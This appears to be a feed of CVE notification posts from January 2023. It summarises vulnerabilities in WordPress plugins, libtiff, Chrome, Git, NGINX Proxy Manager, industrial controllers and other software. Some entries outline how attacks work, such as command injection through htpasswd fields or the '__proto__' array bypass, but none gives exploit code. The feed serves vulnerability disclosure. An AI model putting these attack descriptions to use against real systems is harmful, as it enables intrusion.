| 2023-01-31 00:29:53 |
🚨 CVE-2022-4831The Custom User Profile Fields for User Registration WordPress plugin before 1.8.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:29:49 |
🚨 CVE-2022-4671The PixCodes WordPress plugin before 2.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:29:48 |
🚨 CVE-2022-4680The Revive Old Posts WordPress plugin before 9.0.11 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.🎖@cveNotify |
|
| 2023-01-31 00:29:47 |
🚨 CVE-2022-4306The Panda Pods Repeater Field WordPress plugin before 1.5.4 does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a user having at least Contributor permission.🎖@cveNotify |
|
| 2023-01-31 00:29:46 |
🚨 CVE-2023-0097The Post Grid, Post Carousel, & List Category Posts WordPress plugin before 2.4.19 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-01-31 00:29:45 |
🚨 CVE-2022-4395The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.🎖@cveNotify |
|
| 2023-01-31 00:29:41 |
🚨 CVE-2022-4749The Posts List Designer by Category WordPress plugin before 3.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:29:40 |
🚨 CVE-2022-4470The Widgets for Google Reviews WordPress plugin before 9.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:29:39 |
🚨 CVE-2022-4763The Icon Widget WordPress plugin before 1.3.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-31 00:29:38 |
🚨 CVE-2022-4552The FL3R FeelBox WordPress plugin through 8.1 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2023-01-31 00:29:37 |
🚨 CVE-2022-4765The Portfolio for Elementor WordPress plugin before 2.3.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-30 22:29:57 |
🚨 CVE-2016-8339A buffer overflow in Redis 3.2.x prior to 3.2.4 causes arbitrary code execution when a crafted command is sent. An out of bounds write vulnerability exists in the handling of the client-output-buffer-limit option during the CONFIG SET command for the Redis data structure store. A crafted CONFIG SET command can lead to an out of bounds write potentially resulting in code execution.🎖@cveNotify |
|
| 2023-01-30 22:29:55 |
🚨 CVE-2022-4625The Login Logout Menu WordPress plugin before 1.4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-30 22:29:54 |
🚨 CVE-2017-2786A denial of service vulnerability exists in the psnotifyd application of the Pharos PopUp printer client version 9.0. A specially crafted packet can be sent to the victim's computer and can lead to an out of bounds read causing a crash and a denial of service.🎖@cveNotify |
|
| 2023-01-30 22:29:53 |
🚨 CVE-2022-4542The Compact WP Audio Player WordPress plugin before 1.9.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-30 22:29:52 |
🚨 CVE-2022-4475The Collapse-O-Matic WordPress plugin before 1.8.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-01-30 22:29:50 |
🚨 CVE-2022-45103Dell Unisphere for PowerMax vApp, VASA Provider vApp, and Solution Enabler vApp version 9.2.3.x contain an information disclosure vulnerability. A low privileged remote attacker could potentially exploit this vulnerability, leading to read arbitrary files on the underlying file system.🎖@cveNotify |
|
| 2023-01-30 22:29:49 |
🚨 CVE-2023-20043A vulnerability in Cisco CX Cloud Agent of could allow an authenticated, local attacker to elevate their privileges. This vulnerability is due to insecure file permissions. An attacker could exploit this vulnerability by calling the script with sudo. A successful exploit could allow the attacker to take complete control of the affected device.🎖@cveNotify |
|
| 2023-01-30 22:29:45 |
🚨 CVE-2023-23314An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.🎖@cveNotify |
|
| 2023-01-30 22:29:44 |
🚨 CVE-2017-14457An exploitable information leak/denial of service vulnerability exists in the libevm (Ethereum Virtual Machine) `create2` opcode handler of CPP-Ethereum. A specially crafted smart contract code can cause an out-of-bounds read leading to memory disclosure or denial of service. An attacker can create/send malicious a smart contract to trigger this vulnerability.🎖@cveNotify |
|
| 2023-01-30 22:29:43 |
🚨 CVE-2022-21225Improper neutralization in the Intel(R) Data Center Manager software before version 4.1 may allow an authenticated user to potentially enable escalation of privilege via adjacent access.🎖@cveNotify |
|
| 2023-01-30 22:29:42 |
🚨 CVE-2021-24881The Passster WordPress plugin before 3.5.5.9 does not properly check for password, as well as that the post to be viewed is public, allowing unauthenticated users to bypass the protection offered by the plugin, and access arbitrary posts (such as private) content, by sending a specifically crafted request.🎖@cveNotify |
|
| 2023-01-30 22:29:41 |
🚨 CVE-2019-13741Insufficient validation of untrusted input in Blink in Google Chrome prior to 79.0.3945.79 allowed a local attacker to bypass same origin policy via crafted clipboard content.🎖@cveNotify |
|
| 2023-01-30 20:30:04 |
🚨 CVE-2018-1826IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150429.🎖@cveNotify |
|
| 2023-01-30 20:30:03 |
🚨 CVE-2018-1827IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150430.🎖@cveNotify |
|
| 2023-01-30 20:30:02 |
🚨 CVE-2022-40267Predictable Seed in Pseudo-Random Number Generator (PRNG) vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-xMy/z (x=32,64,96, y=T, z=D,DSS)) with serial number 179**** and prior, and versions 1.074 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MT/DSS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UJ-xMy/z (x=24,40,60, y=T,R, z=ES,ESS) versions 1.042 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UJ-xMy/ES-A (x=24,40,60, y=T,R) versions 1.043 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5S-xMy/z (x=30,40,60,80, y=T,R, z=ES,ESS) versions 1.003 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5UC-32MR/DS-TS versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-R Series R00/01/02CPU all versions, Mitsubishi Electric Corporation MELSEC iQ-R Series R04/08/16/32/120(EN)CPU all versions allows a remote unauthenticated attacker to access the Web server function by guessing the random numbers used for authentication from several used random numbers.🎖@cveNotify |
|
| 2023-01-30 20:30:00 |
🚨 CVE-2018-1892IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 152156.🎖@cveNotify |
|
| 2023-01-30 20:29:59 |
🚨 CVE-2018-1828IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150431.🎖@cveNotify |
|
| 2023-01-30 20:29:58 |
🚨 CVE-2018-1893IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 152157.🎖@cveNotify |
|
| 2023-01-30 20:29:57 |
🚨 CVE-2023-23596jc21 NGINX Proxy Manager through 2.9.19 allows OS command injection. When creating an access list, the backend builds an htpasswd file with crafted username and/or password input that is concatenated without any validation, and is directly passed to the exec command, potentially allowing an authenticated attacker to execute arbitrary commands on the system. NOTE: this is not part of any NGINX software shipped by F5.🎖@cveNotify |
|
| 2023-01-30 20:29:56 |
🚨 CVE-2022-43975An issue was discovered in FC46-WebBridge on GE Grid Solutions MS3000 devices before 3.7.6.25p0_3.2.2.17p0_4.7p0. A vulnerability in the web server allows arbitrary files and configurations to be read via directory traversal over TCP port 8888.🎖@cveNotify |
|
| 2023-01-30 20:29:54 |
🚨 CVE-2019-13564XSS exists in Ping Identity Agentless Integration Kit before 1.5.🎖@cveNotify |
|
| 2023-01-30 20:29:50 |
🚨 CVE-2019-11821SQL injection vulnerability in synophoto_csPhotoDB.php in Synology Photo Station before 6.8.11-3489 and before 6.3-2977 allows remote attackers to execute arbitrary SQL command via the type parameter.🎖@cveNotify |
|
| 2023-01-30 20:29:49 |
🚨 CVE-2019-10346A reflected cross site scripting vulnerability in Jenkins Embeddable Build Status Plugin 2.0.1 and earlier allowed attackers inject arbitrary HTML and JavaScript into the response of this plugin.🎖@cveNotify |
|
| 2023-01-30 20:29:48 |
🚨 CVE-2019-10349A stored cross site scripting vulnerability in Jenkins Dependency Graph Viewer Plugin 0.13 and earlier allowed attackers able to configure jobs in Jenkins to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins.🎖@cveNotify |
|
| 2023-01-30 20:29:47 |
🚨 CVE-2022-46959An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.🎖@cveNotify |
|
| 2023-01-30 20:29:43 |
🚨 CVE-2020-22653In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) before 3.6.2.0.795, ZoneDirector 1100 9.10.2.0.130, ZoneDirector 1200 10.2.1.0.218, ZoneDirector 3000 10.2.1.0.218, ZoneDirector 5000 10.0.1.0.151, a vulnerability allows attackers to exploit the official image signature to force injection unauthorized image signature.🎖@cveNotify |
|
| 2023-01-30 20:29:42 |
🚨 CVE-2022-28217Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system?s Availability by causing system to crash.🎖@cveNotify |
|
| 2023-01-30 20:29:41 |
🚨 CVE-2019-2826Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Roles). Supported versions that are affected are 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-30 20:29:40 |
🚨 CVE-2019-2811Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-30 18:29:53 |
🚨 CVE-2018-3715glance node module before 3.0.4 suffers from a Path Traversal vulnerability due to lack of validation of path passed to it, which allows a malicious user to read content of any file with known path.🎖@cveNotify |
|
| 2023-01-30 18:29:52 |
🚨 CVE-2018-3734stattic node module suffers from a Path Traversal vulnerability due to lack of validation of path, which allows a malicious user to read content of any file with known path.🎖@cveNotify |
|
| 2023-01-30 18:29:51 |
🚨 CVE-2023-24042A race condition in LightFTP through 2.2 allows an attacker to achieve path traversal via a malformed FTP request. A handler thread can use an overwritten context->FileName.🎖@cveNotify |
|
| 2023-01-30 18:29:50 |
🚨 CVE-2022-4876A vulnerability was found in Kaltura mwEmbed up to 2.96.rc1 and classified as problematic. This issue affects some unknown processing of the file includes/DefaultSettings.php. The manipulation of the argument HTTP_X_FORWARDED_HOST leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.96.rc2 is able to address this issue. The name of the patch is 13b8812ebc8c9fa034eed91ab35ba8423a528c0b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217427.🎖@cveNotify |
|
| 2023-01-30 18:29:49 |
🚨 CVE-2023-24038The HTML-StripScripts module through 1.06 for Perl allows _hss_attval_style ReDoS because of catastrophic backtracking for HTML content with certain style attributes.🎖@cveNotify |
|
| 2023-01-30 18:29:48 |
🚨 CVE-2023-21538.NET Denial of Service Vulnerability.🎖@cveNotify |
|
| 2023-01-30 18:29:46 |
🚨 CVE-2022-3145An open redirect vulnerability exists in Okta OIDC Middleware prior to version 5.0.0 allowing an attacker to redirect a user to an arbitrary URL.🎖@cveNotify |
|
| 2023-01-30 18:29:45 |
🚨 CVE-2022-38492An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. One parameter allows SQL injection. Version 2022.1.110.1.02 fixes the vulnerability.🎖@cveNotify |
|
| 2023-01-30 18:29:44 |
🚨 CVE-2022-38490An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Some parameters allow SQL injection. Version 2022.1.110.1.02 corrects this issue.🎖@cveNotify |
|
| 2023-01-30 18:29:43 |
🚨 CVE-2022-38491An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Part of the application does not implement protection against brute-force attacks. Version 2022.1.133.0 corrects this issue.🎖@cveNotify |
|
| 2023-01-30 18:29:42 |
🚨 CVE-2022-38489An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03 It is prone to stored Cross-site Scripting (XSS). Version 2022.1.110.1.02 fixes the vulnerably.🎖@cveNotify |
|
| 2023-01-30 18:29:41 |
🚨 CVE-2022-45923An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The Common Gateway Interface (CGI) program cs.exe allows an attacker to increase/decrease an arbitrary memory address by 1 and trigger a call to a method of a vftable with a vftable pointer value chosen by the attacker.🎖@cveNotify |
|
| 2023-01-30 18:29:40 |
🚨 CVE-2023-22899Zip4j through 2.11.2, as used in Threema and other products, does not always check the MAC when decrypting a ZIP archive.🎖@cveNotify |
|
| 2023-01-30 18:29:39 |
🚨 CVE-2022-23334The Robot application in Ip-label Newtest before v8.5R0 was discovered to use weak signature checks on executed binaries, allowing attackers to have write access and escalate privileges via replacing NEWTESTREMOTEMANAGER.EXE.🎖@cveNotify |
|
| 2023-01-30 18:29:37 |
🚨 CVE-2022-26872AMI Megarac Password reset interception via API🎖@cveNotify |
|
| 2023-01-30 15:29:36 |
🚨 CVE-2022-45788A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that could cause arbitrary code execution, denial of service and loss of confidentiality & integrity when a malicious project file is loaded onto the controller. Affected Products: EcoStruxure™ Control Expert (All Versions), EcoStruxure™ Process Expert (Version V2020 & prior), Modicon M340 CPU (part numbers BMXP34*) (All Versions), Modicon M580 CPU (part numbers BMEP* and BMEH*) (All Versions), Modicon M580 CPU Safety (part numbers BMEP58*S and BMEH58*S) (All Versions), Modicon Momentum Unity M1E Processor (171CBU*) (All Versions), Modicon MC80 (BMKC80) (All Versions), Legacy Modicon Quantum (140CPU65*) and Premium CPUs (TSXP57*) (All Versions)🎖@cveNotify |
|
| 2023-01-30 15:29:35 |
🚨 CVE-2023-0266A use after free vulnerability exists in the ALSA PCM package in the Linux Kernel. SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 is missing locks that can be used in a use-after-free that can result in a priviledge escalation to gain ring0 access from the system user. We recommend upgrading past commit 56b88b50565cd8b946a2d00b0c83927b7ebb055e🎖@cveNotify |
|
| 2023-01-30 14:29:37 |
🚨 CVE-2022-38451A directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-01-30 14:29:36 |
🚨 CVE-2022-42484An OS command injection vulnerability exists in the httpd logs/view.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-01-30 12:29:52 |
🚨 CVE-2023-0472Use after free in WebRTC in Google Chrome prior to 109.0.5414.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-01-30 12:29:48 |
🚨 CVE-2023-0473Type Confusion in ServiceWorker API in Google Chrome prior to 109.0.5414.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-01-30 12:29:47 |
🚨 CVE-2022-46356Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure.🎖@cveNotify |
|
| 2023-01-30 12:29:46 |
🚨 CVE-2022-46357Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure.🎖@cveNotify |
|
| 2023-01-30 12:29:45 |
🚨 CVE-2022-46358Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure.🎖@cveNotify |
|
| 2023-01-30 12:29:42 |
🚨 CVE-2022-46359Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure.🎖@cveNotify |
|
| 2023-01-30 12:29:41 |
🚨 CVE-2023-22333Cross-site scripting vulnerability in EasyMail 2.00.130 and earlier allows a remote unauthenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2023-01-30 12:29:40 |
🚨 CVE-2023-22322Improper restriction of XML external entity reference (XXE) vulnerability exists in OMRON CX-Motion Pro 1.4.6.013 and earlier. If a user opens a specially crafted project file created by an attacker, sensitive information in the file system where CX-Motion Pro is installed may be disclosed.🎖@cveNotify |
|
| 2023-01-30 12:29:39 |
🚨 CVE-2023-22332Information disclosure vulnerability exists in Pgpool-II 4.4.0 to 4.4.1 (4.4 series), 4.3.0 to 4.3.4 (4.3 series), 4.2.0 to 4.2.11 (4.2 series), 4.1.0 to 4.1.14 (4.1 series), 4.0.0 to 4.0.21 (4.0 series), All versions of 3.7 series, All versions of 3.6 series, All versions of 3.5 series, All versions of 3.4 series, and All versions of 3.3 series. A specific database user's authentication information may be obtained by another database user. As a result, the information stored in the database may be altered and/or database may be suspended by a remote attacker who successfully logged in the product with the obtained credentials.🎖@cveNotify |
|
| 2023-01-30 07:30:01 |
🚨 CVE-2022-25761The package open62541/open62541 before 1.2.5, from 1.3-rc1 and before 1.3.1 are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.🎖@cveNotify |
|
| 2023-01-30 07:30:00 |
🚨 CVE-2022-29187Git is a distributed revision control system. Git prior to versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5, is vulnerable to privilege escalation in all platforms. An unsuspecting user could still be affected by the issue reported in CVE-2022-24765, for example when navigating as root into a shared tmp directory that is owned by them, but where an attacker could create a git repository. Versions 2.37.1, 2.36.2, 2.35.4, 2.34.4, 2.33.4, 2.32.3, 2.31.4, and 2.30.5 contain a patch for this issue. The simplest way to avoid being affected by the exploit described in the example is to avoid running git as root (or an Administrator in Windows), and if needed to reduce its use to a minimum. While a generic workaround is not possible, a system could be hardened from the exploit described in the example by removing any such repository if it exists already and creating one as root to block any future attacks.🎖@cveNotify |
|
| 2023-01-30 07:29:59 |
🚨 CVE-2022-24765Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machines, where untrusted parties have write access to the same hard disk. Those untrusted parties could create the folder `C:\.git`, which would be picked up by Git operations run supposedly outside a repository while searching for a Git directory. Git would then respect any config in said Git directory. Git Bash users who set `GIT_PS1_SHOWDIRTYSTATE` are vulnerable as well. Users who installed posh-gitare vulnerable simply by starting a PowerShell. Users of IDEs such as Visual Studio are vulnerable: simply creating a new project would already read and respect the config specified in `C:\.git\config`. Users of the Microsoft fork of Git are vulnerable simply by starting a Git Bash. The problem has been patched in Git for Windows v2.35.2. Users unable to upgrade may create the folder `.git` on all drives where Git commands are run, and remove read/write access from those folders as a workaround. Alternatively, define or extend `GIT_CEILING_DIRECTORIES` to cover the _parent_ directory of the user profile, e.g. `C:\Users` if the user profile is located in `C:\Users\my-user-name`.🎖@cveNotify |
|
| 2023-01-30 07:29:58 |
🚨 CVE-2022-48281processCropSelections in tools/tiffcrop.c in LibTIFF through 4.5.0 has a heap-based buffer overflow (e.g., "WRITE of size 307203") via a crafted TIFF image.🎖@cveNotify |
|
| 2023-01-30 07:29:54 |
🚨 CVE-2022-3570Multiple heap buffer overflows in tiffcrop.c utility in libtiff library Version 4.4.0 allows attacker to trigger unsafe or out of bounds memory access via crafted TIFF image file which could result into application crash, potential information disclosure or any other context-dependent impact🎖@cveNotify |
|
| 2023-01-30 07:29:53 |
🚨 CVE-2022-3597LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6826, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-30 07:29:52 |
🚨 CVE-2022-3627LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6860, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191.🎖@cveNotify |
|
| 2023-01-30 07:29:51 |
🚨 CVE-2022-3636A vulnerability, which was classified as critical, was found in Linux Kernel. This affects the function __mtk_ppe_check_skb of the file drivers/net/ethernet/mediatek/mtk_ppe.c of the component Ethernet Handler. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211935.🎖@cveNotify |
|
| 2023-01-30 07:29:47 |
🚨 CVE-2022-2519There is a double free or corruption in rotateImage() at tiffcrop.c:8839 found in libtiff 4.4.0rc1🎖@cveNotify |
|
| 2023-01-30 07:29:46 |
🚨 CVE-2022-2520A flaw was found in libtiff 4.4.0rc1. There is a sysmalloc assertion fail in rotateImage() at tiffcrop.c:8621 that can cause program crash when reading a crafted input.🎖@cveNotify |
|
| 2023-01-30 07:29:45 |
🚨 CVE-2022-1354A heap buffer overflow flaw was found in Libtiffs' tiffinfo.c in TIFFReadRawDataStriped() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffinfo tool, triggering a heap buffer overflow issue and causing a crash that leads to a denial of service.🎖@cveNotify |
|
| 2023-01-30 07:29:44 |
🚨 CVE-2022-1355A stack buffer overflow flaw was found in Libtiffs' tiffcp.c in main() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffcp tool, triggering a stack buffer overflow issue, possibly corrupting the memory, and causing a crash that leads to a denial of service.🎖@cveNotify |
|
| 2023-01-30 07:29:40 |
🚨 CVE-2022-2953LibTIFF 4.4.0 has an out-of-bounds read in extractImageSection in tools/tiffcrop.c:6905, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 48d6ece8.🎖@cveNotify |
|
| 2023-01-30 07:29:39 |
🚨 CVE-2022-2868libtiff's tiffcrop utility has a improper input validation flaw that can lead to out of bounds read and ultimately cause a crash if an attacker is able to supply a crafted file to tiffcrop.🎖@cveNotify |
|
| 2023-01-30 07:29:38 |
🚨 CVE-2022-2869libtiff's tiffcrop tool has a uint32_t underflow which leads to out of bounds read and write in the extractContigSamples8bits routine. An attacker who supplies a crafted file to tiffcrop could trigger this flaw, most likely by tricking a user into opening the crafted file with tiffcrop. Triggering this flaw could cause a crash or potentially further exploitation.🎖@cveNotify |
|
| 2023-01-30 07:29:37 |
🚨 CVE-2022-34526A stack overflow was discovered in the _TIFFVGetField function of Tiffsplit v4.4.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted TIFF file parsed by the "tiffsplit" or "tiffcrop" utilities.🎖@cveNotify |
|
| 2023-01-30 02:29:40 |
🚨 CVE-2021-46873WireGuard, such as WireGuard 0.5.3 on Windows, does not fully account for the possibility that an adversary might be able to set a victim's system time to a future value, e.g., because unauthenticated NTP is used. This can lead to an outcome in which one static private key becomes permanently useless.🎖@cveNotify |
|
| 2023-01-30 02:29:39 |
🚨 CVE-2023-0572Unchecked Error Condition in GitHub repository froxlor/froxlor prior to 2.0.10.🎖@cveNotify |
|
| 2023-01-30 00:29:42 |
🚨 CVE-2023-0565Business Logic Errors in GitHub repository froxlor/froxlor prior to 2.0.10.🎖@cveNotify |
|
| 2023-01-30 00:29:41 |
🚨 CVE-2023-0566Static Code Injection in GitHub repository froxlor/froxlor prior to 2.0.10.🎖@cveNotify |
|
| 2023-01-30 00:29:39 |
🚨 CVE-2023-24065NOSH 4a5cfdb allows stored XSS via the create user page. For example, a first name (of a physician, assistant, or billing user) can have a JavaScript payload that is executed upon visiting the /users/2/1 page. This may allow attackers to steal Protected Health Information because the product is for health charting.🎖@cveNotify |
|
| 2023-01-29 22:29:41 |
🚨 CVE-2009-10003A vulnerability was found in capnsquarepants wordcraft up to 0.6. It has been classified as problematic. Affected is an unknown function of the file tag.php. The manipulation of the argument tag leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 0.7 is able to address this issue. The name of the patch is be23028633e8105de92f387036871c03f34d3124. It is recommended to upgrade the affected component. VDB-219714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-29 22:29:39 |
🚨 CVE-2016-15022A vulnerability was found in mosbth cimage up to 0.7.18. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file check_system.php. The manipulation of the argument $_SERVER['SERVER_SOFTWARE'] leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.7.19 is able to address this issue. The name of the patch is 401478c8393989836beeddfeac5ce44570af162b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-219715.🎖@cveNotify |
|
| 2023-01-29 20:29:44 |
🚨 CVE-2023-0570A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file user\operations\payment_operation.php. The manipulation of the argument booking_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219729 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-29 20:29:42 |
🚨 CVE-2023-0571A vulnerability has been found in SourceCodester Canteen Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file createcustomer.php of the component Add Customer. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-219730 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-29 20:29:41 |
🚨 CVE-2021-3805object-path is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')🎖@cveNotify |
|
| 2023-01-29 20:29:40 |
🚨 CVE-2021-23434This affects the package object-path before 0.11.6. A type confusion vulnerability can lead to a bypass of CVE-2020-15256 when the path components used in the path parameter are arrays. In particular, the condition currentPath === '__proto__' returns false if currentPath is ['__proto__']. This is because the === operator returns always false when the type of the operands is different.🎖@cveNotify |
|
